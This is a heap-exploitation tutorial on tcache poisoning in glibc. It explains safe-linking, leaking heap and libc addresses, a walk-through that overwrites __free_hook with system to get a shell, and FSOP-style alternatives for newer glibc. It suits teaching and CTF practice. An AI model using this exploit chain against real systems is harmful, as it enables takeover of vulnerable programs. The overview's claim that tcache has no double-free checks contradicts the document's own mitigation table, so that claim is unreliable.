Heap Exploitation 101: Tcache Poisoning on glibc 2.35
Understanding tcache internals and poisoning the freelist for arbitrary write on modern glibc - covering safe-linking, heap and libc leaks, and a complete exploit walk-through against a use-after-free.
Tcache Overview
Since glibc 2.26, the per-thread cache holds up to 7 freed chunks per size class in a singly-linked LIFO list. Poisoning the forward pointer redirects where the next allocation lands.
The tcache (thread-local caching bin) was introduced for performance - most allocations are small and short-lived, so an unsynchronised per-thread free list dramatically reduces lock contention compared to the older fastbin / smallbin paths. From an attacker’s perspective, this same simplicity makes it the cleanest primitive in modern heap exploitation: there are no double-free checks, no size sanity, no bin-list integrity checks beyond tcache_count, and no coalescing. If you can land a single write into the right place, you own the next allocation of that size class.
Internal Layout
When a chunk is freed and lands in the tcache, glibc reuses the user data area to form a singly-linked list. The first 8 bytes (where the user used to write) become next, a pointer to the previously freed chunk (the next element in the list), and the second 8 bytes become key - a per-thread sentinel meant to detect double-frees.
Freed chunk in tcache:
```
+--------------+--------------+
|  prev_size   |     size     |   ← chunk header (16 bytes on x64)
+--------------+--------------+
|  next (fd)   |     key      |   ← user-data area, repurposed
+--------------+--------------+
|   ... unused user data ...  |
+--------------+--------------+
```
The corresponding tcache_perthread_struct lives at the start of the heap and carries one entry per size class:
```c
typedef struct tcache_perthread_struct {
  uint16_t counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];  // per-size LIFO heads
} tcache_perthread_struct;
```
malloc(n) for a tcache-eligible size first checks entries[idx], and if non-NULL, unlinks the head: entries[idx] = head->next. That single dereference is exactly what poisoning targets - control head->next and the next allocation of that size returns wherever you point.
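That head-unlink behaviour can be modelled in a few lines of Python. This is a toy model with integers as "addresses"; the class and names are invented for illustration - the real logic lives in tcache_put/tcache_get in glibc's malloc.c:

```python
# Toy model of one tcache bin. put() mirrors the free() path (push on the
# LIFO head), get() mirrors the malloc() path (entries[idx] = head->next).
class TcacheBin:
    def __init__(self):
        self.head = None          # entries[idx]
        self.count = 0            # counts[idx]
        self.next_ptrs = {}       # chunk_addr -> value of its 'next' field

    def put(self, chunk):
        self.next_ptrs[chunk] = self.head
        self.head = chunk
        self.count += 1

    def get(self):
        chunk = self.head
        self.head = self.next_ptrs[chunk]   # the dereference poisoning targets
        self.count -= 1
        return chunk

bin40 = TcacheBin()
bin40.put(0x1000)              # free(A)
bin40.put(0x2000)              # free(B)
assert bin40.get() == 0x2000   # LIFO: last freed is first returned
assert bin40.get() == 0x1000
```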
Size Classes Cached
On x64, tcache caches sizes from 0x20 (smallest user-callable malloc) up to 0x410 in 0x10 increments - 64 size classes total, 7 chunks each, so a thread can keep 448 cached chunks before falling back to fastbin/unsorted bin paths.
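For concreteness, here is a sketch of the request-size to bin-index mapping, mirroring glibc's request2size/csize2tidx with x86-64 constants (SIZE_SZ = 8, MALLOC_ALIGNMENT = 0x10, MINSIZE = 0x20):

```python
# Request size -> chunk size -> tcache bin index, x86-64 constants.
def request2size(req):
    # Add 8 bytes of header overhead, round up to 16, clamp to MINSIZE.
    return max(0x20, (req + 8 + 0xF) & ~0xF)

def csize2tidx(csize):
    # glibc: ((csize) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT
    return (csize - 0x20 + 0xF) // 0x10

assert csize2tidx(request2size(0x18)) == 0    # 0x18 request -> 0x20 chunk, bin 0
assert csize2tidx(request2size(0x40)) == 3    # 0x40 request -> 0x50 chunk, bin 3
assert csize2tidx(0x410) == 63                # largest cached class, bin 63
```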
The Core Primitive
The classic tcache-poison flow assumes a use-after-free or off-by-one that lets you write to a freed chunk’s next pointer:
```
1. free(A)  → tcache[idx] = A, A->next = NULL
2. free(B)  → tcache[idx] = B, B->next = A
3. UAF write on B: overwrite B->next = TARGET
4. malloc() → returns B
5. malloc() → returns TARGET   ← arbitrary allocation
```
Step 5 is the magic moment. Whatever TARGET is - __free_hook, __malloc_hook, a function pointer in .bss, an entry in a vtable, the _IO_2_1_stdout_ FILE struct - the next allocation lands there, and you can write controlled bytes to it.
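The five steps above can be simulated with a toy freelist - integers stand in for addresses, there is no safe-linking yet, and TARGET is a hypothetical stand-in for something like __free_hook:

```python
# Minimal tcache-poison simulation: a dict models the heap's 'next' fields.
heap = {}     # chunk_addr -> value of that chunk's next field
head = None   # tcache[idx]

def free(chunk):
    global head
    heap[chunk] = head          # chunk->next = old head
    head = chunk

def malloc():
    global head
    chunk = head
    head = heap.get(chunk)      # entries[idx] = head->next
    return chunk

A, B, TARGET = 0x1000, 0x2000, 0xdeadbeef0   # TARGET is 16-byte aligned
free(A)                      # tcache: A
free(B)                      # tcache: B -> A
heap[B] = TARGET             # step 3: UAF write on B->next
assert malloc() == B         # step 4
assert malloc() == TARGET    # step 5: next allocation lands on the target
```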
Safe-Linking (glibc >= 2.32)
Modern glibc XORs the forward pointer with chunk_addr >> 12. You need a heap leak to compute the correct mangled pointer.
This mitigation, introduced by Eyal Itkin, echoes the freelist-pointer obfuscation in the Linux kernel (CONFIG_SLAB_FREELIST_HARDENED). The idea is brutally simple: instead of storing a raw next pointer, glibc stores PROTECT_PTR(pos, ptr), defined as:
```c
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)
```
The pos argument is the address of the slot holding the pointer (i.e. the chunk address itself). Two consequences:
- You can't blindly write a target address. Without knowing where the current chunk lives in the heap, you cannot pre-compute the XOR mask, so a single arbitrary write into next produces garbage.
- Forged pointers must be 16-byte aligned. Since glibc 2.32, the allocator also checks that the unmasked pointer is 16-byte aligned (via aligned_OK on the revealed pointer, aborting with errors like "malloc(): unaligned tcache chunk detected"). So your forged target must be aligned, which rules out some "land in the middle of a buffer" tricks but not others.
In short: safe-linking turns “one UAF write = arbitrary allocation” into “one UAF write plus a heap leak = arbitrary allocation”. It is a speed bump, not a wall.
Computing the Mask
Given a heap leak and a target target_addr:

```python
def mangle(heap_addr_of_chunk, target_addr):
    return (heap_addr_of_chunk >> 12) ^ target_addr
```

Note that you need the address of the chunk whose next field you are corrupting, not the heap base (strictly, only the upper bits matter, since only addr >> 12 enters the XOR). With any leaked heap-resident pointer - e.g. a freed chunk's mangled next, or fd/bk of chunks sitting in the unsorted bin - you can derive it.
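A quick sanity check: the mangling is an involution, so the same function both builds the poisoned value and, given the slot address, reverses it (that is what glibc's REVEAL_PTR does). The addresses below are made up for illustration:

```python
def mangle(pos, ptr):
    # PROTECT_PTR: XOR the pointer with the storing slot's address >> 12.
    return (pos >> 12) ^ ptr

chunk_b = 0x55a0deadb2a0        # hypothetical address of the chunk being corrupted
target  = 0x7f1234567890        # hypothetical forged target, 16-byte aligned

m = mangle(chunk_b, target)     # value to write into b->next
# XORing twice with the same mask recovers the original pointer:
assert mangle(chunk_b, m) == target
```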
Exploit Flow
- Leak heap address (for safe-linking bypass)
- Leak libc (via unsorted bin)
- Tcache poison → overwrite __free_hook with system
- Free a chunk containing "/bin/sh" → shell
Each step deserves its own walk-through, because the order matters and the chunks must be sized carefully.
Step 1 - Heap Leak
The cleanest source is the tcache itself. When you free chunk A and then chunk B into the same size class, B's next field becomes mangle(&B, A). If you can read B (via a print/show primitive on the freed object - a UAF read, or an over-read past a missing null terminator) you read the mangled value. Knowing that next should equal A's address XOR (&B >> 12), the page-aligned heap base falls out immediately, because chunk addresses share their high bits with the heap base.
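This recovery is often packaged as a small "decrypt" routine that peels the pointer out of the leaked value 12 bits at a time from the top, using the bits recovered so far as the next round's key. It works whenever the chunk holding next and the chunk it points to share their upper address bits, which is the normal case for a single heap. A sketch with made-up addresses:

```python
def decrypt(mangled):
    # Recover the plaintext pointer from a leaked mangled next field,
    # assuming storer and storee share their high address bits.
    key = 0
    plain = 0
    for i in range(1, 6):
        bits = max(64 - 12 * i, 0)
        plain = ((mangled ^ key) >> bits) << bits   # fix the next 12 bits
        key = plain >> 12                           # refine the XOR key
    return plain

# Chunk B holds next = mangle(&B, A); a UAF read of B leaks this value.
A, B = 0x557000000b40, 0x557000000ba0
leaked = (B >> 12) ^ A
assert decrypt(leaked) == A          # full heap address recovered
heap_page = decrypt(leaked) & ~0xFFF
```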
Alternative leak sources:
- Unsorted bin chunks: chunks larger than 0x410 (above the tcache range) freed without immediate reuse end up in the unsorted bin, whose fd/bk point into main_arena. With two or more chunks in the bin, the list also threads through the heap, giving you both libc and heap leaks.
- Large bin chunks: carry fd_nextsize/bk_nextsize pointers, which also yield heap addresses.
- Tcache stash mechanism (glibc ≥ 2.29): when the tcache is partially full and a smallbin allocation happens, glibc stashes extra smallbin chunks back into the tcache, and their bk pointers contain libc-side addresses.
Step 2 - Libc Leak
To call system, execve, or use a one-gadget, you need the libc base. The standard trick is to allocate a chunk larger than 0x410 (above the tcache range) and free it, so it lands in the unsorted bin with fd/bk pointing into main_arena. You can then read those pointers back - directly via the UAF, or by reallocating the chunk and reading residual bytes the program never overwrote:
```c
// 1. Allocate a 0x500-byte chunk (above tcache range)
A = malloc(0x500);
B = malloc(0x20);   // guard chunk to prevent merging into the top chunk
// 2. Free A - goes into unsorted bin, fd/bk now point into main_arena
free(A);
// 3. Read A back (UAF) - first 8 bytes are an address inside libc
libc_leak = read(A, 8);
libc_base = libc_leak - MAIN_ARENA_OFFSET;
```
MAIN_ARENA_OFFSET is constant per glibc build and easy to derive from a copy of libc.so.6.
Step 3 - Tcache Poison
With both leaks, target __free_hook (present only through glibc 2.33; for newer versions see the hook-removal section below). It's a writable function pointer in libc that, if non-NULL, is called by free() with the freed pointer as its argument - perfect for system("/bin/sh"), because the chunk's contents become the command and its pointer becomes the argument.
```python
# Two same-size chunks
a = malloc(0x40)
b = malloc(0x40)

# Free both into tcache: head = b, b->next = mangle(&b, a)
free(a)
free(b)

# UAF write on b: overwrite next with the mangled target
free_hook = libc_base + LIBC_FREE_HOOK_OFFSET
mangled = (heap_addr_of_b >> 12) ^ free_hook
write(b, p64(mangled))

# Drain the tcache
malloc(0x40)            # returns b
target = malloc(0x40)   # returns __free_hook  <- arbitrary allocation
write(target, p64(libc_base + LIBC_SYSTEM_OFFSET))
```
Step 4 - Trigger
Allocate a chunk whose user data starts with "/bin/sh\0", then free it. The free() call now jumps to __free_hook, which has been replaced with system, with the user-data pointer (/bin/sh) as its first argument:
```python
sh = malloc(0x40)
write(sh, b"/bin/sh\x00")
free(sh)   # -> system("/bin/sh") -> shell
```
Hook Removal in glibc 2.34+
__malloc_hook and __free_hook were removed in glibc 2.34. On a modern target you can no longer use this exact landing pad. The current canonical replacements are:
- FILE struct exploitation: poison _IO_list_all to point at a fake _IO_FILE whose vtable points to controlled memory, then trigger any printf/fwrite/exit-flush. Search for "House of Apple 2", "House of Banana", "FSOP".
- __exit_funcs: glibc keeps a linked list of functions to call at process exit. The stored function pointers are mangled with PTR_MANGLE (XOR plus rotate with tls.pointer_guard), so you also need a TLS leak.
- stdout: _IO_2_1_stdout_->_wide_data->_wide_vtable is a particularly clean target post-2.34, exercised by FSOP chains.
- tls_dtor_list: another callback list reachable at exit if __cxa_thread_atexit_impl was used.
The high-level pattern is the same: tcache-poison your way to writing a fake vtable pointer into a structure that is dereferenced for an indirect call.
Defensive Notes
| Mitigation | Effect on tcache-poison |
|---|---|
| Safe-linking (2.32+) | Requires a heap leak |
| tcache count integrity check (2.29+) | Counter incremented on free; over-allocation traps. Not a real obstacle. |
| tcache key double-free check (2.29+) | Compares key to a per-thread sentinel; freeing twice without changing key aborts. |
| 16-byte alignment check (2.32+) | Forged target addresses must be 16-byte aligned |
| __malloc_hook/__free_hook removal (2.34+) | Forces FILE-stream / __exit_funcs chains |
| _FORTIFY_SOURCE=2/3 | Catches a handful of overflow primitives, but not the freelist write |
| MALLOC_CHECK_=3 env | Strong overflow/double-free detection; opt-in only |
Modern heap exploitation is all about leaking the right addresses. Once you have heap base + libc base, the rest is mechanical. Tcache is the simplest primitive in the allocator and the first one you should master before diving into fastbin attacks, unsorted-bin attacks, large-bin tricks, or House-of-* recipes.